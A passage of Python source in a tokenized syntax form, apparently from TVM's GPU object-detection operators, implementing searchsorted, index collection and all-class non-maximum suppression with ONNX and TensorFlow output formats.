valid_count<block_start>ib=tvm.tir.ir_builder.create()<line_sep>scores=ib.buffer_ptr(scores)<line_sep>valid_count=ib.buffer_ptr(valid_count)<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>ib.scope_attr(bx "thread_extent" ceil_div(batch_classes max_threads))<line_sep>ib.scope_attr(tx "thread_extent" max_threads)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>batch_classes)<block_start>binary_search(ib tid num_boxes scores score_threshold valid_count)<block_end><block_end><return>ib.get()<block_end>scores_buf=tvm.tir.decl_buffer(scores.shape scores.dtype "scores_buf" data_alignment=8)<line_sep><return>te.extern([(batch_classes )] [scores] <lambda>ins outs:searchsorted_ir(ins[0] outs[0]) dtype=["int32"] in_buffers=[scores_buf] name="searchsorted" tag="searchsorted" )<block_end><def_stmt>_collect_selected_indices_ir num_class selected_indices num_detections row_offsets out<block_start>batch_classes,num_boxes=selected_indices.shape<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>selected_indices=ib.buffer_ptr(selected_indices)<line_sep>num_detections=ib.buffer_ptr(num_detections)<line_sep>row_offsets=ib.buffer_ptr(row_offsets)<line_sep>out=ib.buffer_ptr(out)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_boxes nthread_tx)<line_sep>nthread_by=batch_classes<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<with_stmt>ib.new_scope()<block_start>idx=bx<times>nthread_tx+tx<line_sep>idy=cast(by "int64")<line_sep>batch_id=idy<floordiv>num_class<line_sep>class_id=idy%num_class<with_stmt>ib.if_scope(idx<l>num_detections[idy])<block_start>out[row_offsets[idy]+idx 0]=batch_id<line_sep>out[row_offsets[idy]+idx 1]=class_id<line_sep>out[row_offsets[idy]+idx 2]=cast(selected_indices[idy idx] "int64")<block_end><block_end><return>ib.get()<block_end><def_stmt>_collect_selected_indices_and_scores_ir selected_indices selected_scores num_detections row_offsets num_total_detections collected_indices collected_scores <block_start>batch_size,num_class=row_offsets.shape<line_sep>num_boxes=selected_indices.shape[1]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>selected_indices=ib.buffer_ptr(selected_indices)<line_sep>selected_scores=ib.buffer_ptr(selected_scores)<line_sep>num_detections=ib.buffer_ptr(num_detections)<line_sep>row_offsets=ib.buffer_ptr(row_offsets)<line_sep>num_total_detections=ib.buffer_ptr(num_total_detections)<line_sep>collected_indices=ib.buffer_ptr(collected_indices)<line_sep>collected_scores=ib.buffer_ptr(collected_scores)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_boxes nthread_tx)<line_sep>nthread_by=batch_size<times>num_class<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>zero=cast(0 "int64")<with_stmt>ib.new_scope()<block_start>idx=bx<times>nthread_tx+tx<line_sep>idy=cast(by "int64")<line_sep>batch_id=idy<floordiv>num_class<line_sep>class_id=idy%num_class<with_stmt>ib.if_scope(idx<l>num_detections[batch_id class_id])<block_start>offset=row_offsets[batch_id class_id]+idx<line_sep>collected_indices[batch_id offset 0]=class_id<line_sep>collected_indices[batch_id offset 1]=cast(selected_indices[idy idx] "int64")<line_sep>collected_scores[batch_id offset]=selected_scores[idy idx]<block_end><with_stmt>ib.else_scope()<block_start><with_stmt>ib.if_scope(idx<l>num_boxes)<block_start>offset=(num_total_detections[batch_id]+class_id<times>num_boxes-row_offsets[batch_id class_id]+idx-num_detections[batch_id class_id])<line_sep>collected_indices[batch_id offset 0]=zero<line_sep>collected_indices[batch_id offset 1]=zero<line_sep>collected_scores[batch_id offset]=0.0<block_end><block_end><block_end><return>ib.get()<block_end><def_stmt>all_class_non_max_suppression boxes scores max_output_boxes_per_class iou_threshold score_threshold output_format="onnx" <block_start>"""Non-maximum suppression operator for object detection, corresponding to ONNX NonMaxSuppression and TensorFlow combined_non_max_suppression. NMS is performed for each class separately. Parameters ---------- boxes : tvm.te.Tensor 3-D tensor with shape (batch_size, num_boxes, 4) scores: tvm.te.Tensor 3-D tensor with shape (batch_size, num_classes, num_boxes) max_output_boxes_per_class : int or tvm.te.Tensor, optional The maxinum number of output selected boxes per class iou_threshold : float or tvm.te.Tensor, optionaIl IoU test threshold score_threshold : float or tvm.te.Tensor, optional Score threshold to filter out low score boxes early output_format : str, optional "onnx" or "tensorflow", see below Returns ------- out : list of tvm.te.Tensor If `output_format` is "onnx", the output is two tensors. The first is `indices` of size `(batch_size * num_class* num_boxes , 3)` and the second is a scalar tensor `num_total_detection` of shape `(1,)` representing the total number of selected boxes. The three values in `indices` encode batch, class, and box indices. Rows of `indices` are ordered such that selected boxes from batch 0, class 0 come first, in descending of scores, followed by boxes from batch 0, class 1 etc. Out of `batch_size * num_class* num_boxes` rows of indices, only the first `num_total_detection` rows are valid. If `output_format` is "tensorflow", the output is three tensors, the first is `indices` of size `(batch_size, num_class * num_boxes , 2)`, the second is `scores` of size `(batch_size, num_class * num_boxes)`, and the third is `num_total_detection` of size `(batch_size,)` representing the total number of selected boxes per batch. The two values in `indices` encode class and box indices. Of num_class * num_boxes boxes in `indices` at batch b, only the first `num_total_detection[b]` entries are valid. The second axis of `indices` and `scores` are sorted within each class by box scores, but not across classes. So the box indices and scores for the class 0 come first in a sorted order, followed by the class 1 etc. """<line_sep>batch,num_class,num_boxes=scores.shape<line_sep>scores=reshape(scores (batch<times>num_class num_boxes))<line_sep>sorted_scores,sorted_indices=_dispatch_sort(scores ret_type="both")<line_sep>valid_count=_get_valid_box_count(sorted_scores score_threshold)<line_sep>selected_indices,selected_scores,num_detections=run_all_class_nms(boxes sorted_scores sorted_indices valid_count max_output_boxes_per_class iou_threshold _nms_loop return_scores=(output_format<eq>"tensorflow") )<if_stmt>output_format<eq>"onnx"<block_start>row_offsets,num_total_detections=exclusive_scan(num_detections return_reduction=<true> output_dtype="int64")<line_sep>selected_indices=collect_selected_indices(num_class selected_indices num_detections row_offsets _collect_selected_indices_ir)<line_sep><return>[selected_indices num_total_detections]<block_end>num_detections_per_batch=reshape(num_detections (batch num_class))<line_sep>row_offsets,num_total_detections=exclusive_scan(num_detections_per_batch return_reduction=<true> output_dtype="int64" axis=1)<line_sep>selected_indices,selected_scores=collect_selected_indices_and_scores(selected_indices selected_scores num_detections_per_batch row_offsets num_total_detections _collect_selected_indices_and_scores_ir )<line_sep><return>[selected_indices selected_scores num_total_detections]<block_end>